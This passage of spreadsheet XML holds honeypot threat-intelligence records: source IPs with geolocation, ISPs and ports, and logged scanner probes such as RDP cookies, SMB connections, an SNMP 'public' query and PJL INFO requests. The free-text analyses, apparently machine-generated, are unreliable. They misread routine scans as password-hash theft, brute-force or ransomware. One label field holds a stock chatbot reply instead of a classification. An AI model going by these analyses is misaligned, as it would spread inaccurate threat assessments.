SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SMB_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;5432&amp;&amp;3389&amp;&amp;143&amp;&amp;110&amp;&amp;NA&amp;&amp;1521&amp;&amp;1433&amp;&amp;445&amp;&amp;161&amp;&amp;50456&amp;&amp;5900&amp;&amp;13205&amp;&amp;23&amp;&amp;58614&amp;&amp;58610&amp;&amp;3306&amp;&amp;6667&amp;&amp;8443&amp;&amp;9100&amp;&amp;6379&amp;&amp;52375&amp;&amp;389&amp;&amp;53941&amp;&amp;80&amp;&amp;443&amp;&amp;50574&amp;&amp;21&amp;&amp;58547&amp;&amp;51053&amp;&amp;57221&amp;&amp;49726&amp;&amp;55523&amp;&amp;50564&amp;&amp;53716&amp;&amp;50010"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="65"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;query&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,57664)}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EiigDwoqT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdtmkW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PYCWWe'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64526)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64534)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64550)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ebiTivlyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZuhqCa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UTBtyz'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eomKVpJyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GRiUUk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Jjeauc'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=szhhaCLVG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pWwsPp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TEvjmx'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60316)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60322)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60324)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GptwUHMkA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nloWTJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=plHNlt'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yBKMYbFrw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CHzxhu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CCjnUQ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zJSFVIGeT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wkdFrO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UdTmmz'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64050)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GuotzRQMB'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dsjrXyGFE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AeolYg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YOPwtG'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f26"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No data is provided to analyze. &amp;&amp; No malicious FTP activity detected, as &quot;NA&quot; indicates no connection attempt or login occurred. This suggests that an attacker did not attempt to exploit the FTP service. No suspicious FTP-related actions were logged. &amp;&amp; The log indicates an incoming SIP (Session Initiation Protocol) connection attempt from an unknown source._x000a_No data is available for this session, suggesting the attacker may be probing or scanning for vulnerabilities._x000a_This could be a reconnaissance activity by a potential attacker. &amp;&amp; No log data provided, therefore cannot analyze or describe any possible malicious activity. &amp;&amp; This data suggests an attempt to exploit a vulnerability in the Remote Desktop Protocol, with the potential goal of gaining unauthorized access or executing malicious code on the target system. The presence of a &quot;mstshash&quot; cookie indicates a possible brute-force attack against authentication mechanisms. This may be indicative of a malicious actor trying to gain control over the system. &amp;&amp; The log indicates a potential attempt to use an anonymous proxy service, but no connection was established as indicated by &quot;NA&quot; for SOCKS5 data. This could be an indication of reconnaissance or an attempt to hide malicious activity through IP address obfuscation. The lack of actual data suggests the attempt may have been unsuccessful. &amp;&amp; Possible print job submission to gain unauthorized access to printer settings or services, potentially leading to further malicious activity such as data exfiltration or system compromise. This is an attempt to exploit a vulnerability in the printing service for malicious purposes. The goal is likely to gain control over printer operations and functionality. &amp;&amp; This log indicates a potential attempt to exploit the printer spooler service, likely as part of a larger attack vector. Malicious actors are probing for vulnerabilities and testing system weaknesses. The activity suggests an attacker attempting to gather information about the target system's configuration. &amp;&amp; The data suggests a possible attempt to steal session hashes, specifically the Microsoft Terminal Services hash (mstshash), which could be used for unauthorized access. This is likely an attempt at stealing credentials from an RDP connection. A potential password cracking or brute force attack may follow this activity. &amp;&amp; This log data suggests that an attacker is attempting to brute-force access to a remote desktop session, likely using a dictionary attack with the password hash being revealed. The presence of the cookie parameter indicates that the attacker has successfully authenticated at some point. This activity could be indicative of a password cracking attempt. &amp;&amp; Possible malicious activity involves attempting to bypass Windows authentication by spoofing the Secure Hash Algorithm (SHA) hash value, potentially leading to unauthorized access. This is often used in brute-force attacks or password cracking. It may be an attempt to gain remote access to a system. &amp;&amp; The log data suggests an attempt to inject malware through Remote Desktop Protocol (RDP) to gain unauthorized access and control of the system, potentially leading to data theft or further malicious activities. The presence of a cookie with an mstshash value indicates an attempt to bypass security measures, specifically targeting Microsoft Terminal Server licensing. &amp;&amp; An attacker is trying to authenticate using a stolen or guessed RDP password hash, likely attempting to gain unauthorized access to the system._x000a_The presence of an invalid or fake password hash suggests malicious activity and potential brute-force attacks._x000a_This could be an attempt to exploit weak passwords on the network. &amp;&amp; This log entry suggests an attempt to brute-force login to a Remote Desktop service, likely using a malicious tool to guess or crack passwords. The presence of a hash value indicates the attacker is trying to authenticate with a valid user account and password combination. This activity may be part of a larger cyber attack aimed at gaining unauthorized access to the system. &amp;&amp; Unauthorized access to a device with a default community string 'public' is possible, potentially allowing attackers to collect system information and configuration details. _x000a_This could be a sign of an insider attack or an attempt to gather intelligence on the target system's SNMP settings. &amp;&amp; Unknown client sending capability request, possibly probing for vulnerabilities or attempting to exploit a weakness in the server's capabilities handling. This could be an initial step in a more malicious attack. The intent is likely reconnaissance or exploitation."/>
    <s v="SIP Attack &amp;&amp; Port Scan &amp;&amp; Print Job Attack &amp;&amp; Printer Spoofing &amp;&amp; RDP Ransom &amp;&amp; RDP Exploit &amp;&amp; RDP Poisoning &amp;&amp; Rdp Brute &amp;&amp; RDP Brute &amp;&amp; RDP Ransomware &amp;&amp; SNMP Brute &amp;&amp; Nmap Scan"/>
  </r>
  <r>
    <x v="146"/>
    <x v="146"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:11:29"/>
    <d v="2023-11-25T15:08:40"/>
    <d v="2025-04-30T14:11:29"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;27379&amp;&amp;45446&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chengalpattu"/>
    <s v="Madipakkam"/>
    <s v="1465825"/>
    <s v="NA"/>
    <s v="12.9623"/>
    <s v="80.1986"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d212:b5b8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="147"/>
    <x v="147"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:11:12"/>
    <d v="2023-07-29T11:51:16"/>
    <d v="2025-04-30T14:11:12"/>
    <n v="404"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="00"/>
    <s v="National Capital Region"/>
    <s v="Eastern Manila District"/>
    <s v="Mandaluyong"/>
    <s v="13118244"/>
    <s v="1550"/>
    <s v="14.5764"/>
    <s v="121.039"/>
    <s v="9299"/>
    <s v="Philippine Long Distance Telephone Co."/>
    <s v="Philippine Long Distance Telephone Co."/>
    <s v="residential"/>
    <s v="Philippine Long Distance Telephone Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,62513)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,62633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,52583)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,55001)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50593)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50666)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,57025)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,57488)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,49890)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,49970)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,53741)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,53785)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,61504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,61622)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,51902)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,51980)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,63038)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,63163)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50856)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50983)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,52869)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54346)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54433)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54783)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a36:8f9c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A remote computer is attempting to connect to a shared resource on this system from an unknown IP address. This could be part of a larger malicious operation to gain unauthorized access or spread malware. The request likely originates from a compromised host or a botnet. &amp;&amp; An incoming connection from an unknown IP address suggests a potential attack attempt to access shared resources on the network._x000a_The attacker may be attempting to exploit vulnerabilities or gain unauthorized access to sensitive files and directories._x000a_This could be indicative of a malicious SMB scan or brute-force login attempt. &amp;&amp; An incoming connection was attempted from an external IP address to a SMB service. This could be an attempt to exploit the service for malicious purposes such as file sharing or spreading malware. The source IP may indicate the origin of the attack. &amp;&amp; A possible malicious activity is an incoming connection attempt from an unknown IP address to a SMB service. This could be a brute-force attack or unauthorized access attempt. The IP 122.54.143.156 may be attempting to exploit vulnerabilities in the SMB service for malicious purposes. &amp;&amp; This data suggests an unknown activity occurred, as there is no information provided about any malicious behavior or otherwise._x000a_It indicates a lack of data, making it impossible to analyze or draw conclusions from the given information. &amp;&amp; A remote system is attempting to establish a connection to a service on this network from an external IP address 122.54.143.156, using a non-standard port. This could be an attempt to exploit the service for malicious purposes or gain unauthorized access. The use of a non-standard port suggests potential reconnaissance or scanning activity."/>
    <s v="Port Scanner &amp;&amp; Port Scanner &amp;&amp; SMB Attack"/>
  </r>
  <r>
    <x v="148"/>
    <x v="148"/>
    <s v="59-127-199-170.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:11:00"/>
    <d v="2023-07-28T00:30:20"/>
    <d v="2025-04-30T14:11:00"/>
    <n v="324"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55454&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:c7aa"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="149"/>
    <x v="149"/>
    <s v="c-68-45-120-65.hsd1.in.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:10:29"/>
    <d v="2024-11-23T05:28:50"/>
    <d v="2025-04-30T14:10:29"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IN"/>
    <s v="Indiana"/>
    <s v="Blackford"/>
    <s v="Hartford City"/>
    <s v="4921229"/>
    <s v="47348"/>
    <s v="40.4512"/>
    <s v="-85.37"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:442d:7841"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="150"/>
    <x v="150"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:10:19"/>
    <d v="2024-12-08T15:37:44"/>
    <d v="2025-04-30T14:10:19"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H27"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,56961)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,57079)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55422)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55591)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,53668)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,54235)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,54408)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50888)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49628)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55890)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,62894)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,62996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,52341)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,52492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49642)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50008)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,58339)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:3457"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient data provided for analysis. &amp;&amp; This log entry suggests that there was an attempt to access Microsoft SQL Server without specifying credentials, indicating a potential brute force attack or malicious query scanning. _x000a_The attacker may be trying to identify vulnerabilities in the database's security settings._x000a_This could be a precursor to further malicious activity such as data theft or exploitation of SQL injection vulnerabilities."/>
    <s v="I don't see any log data provided. Please provide the actual log data for me to analyze. I'll be happy to help you identify the type of attack and categorize it with a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="151"/>
    <x v="151"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:09:46"/>
    <d v="2024-06-25T14:41:35"/>
    <d v="2025-04-30T14:09:46"/>
    <n v="83"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
